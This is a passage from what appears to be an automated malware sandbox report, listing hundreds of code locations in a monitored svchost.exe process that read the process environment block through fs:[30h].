                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC9179 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B05152 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A37152 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2D08D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A35096 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6909C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A550E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A550E4 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B050D9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A590DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB106E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B05060 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD070 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD705E mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD705E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5B052 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB97A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B037B6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF78A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF72E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A33720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF972B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A65734 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A37703 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B03749 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A636EF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AED6F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A616CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B05636 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]
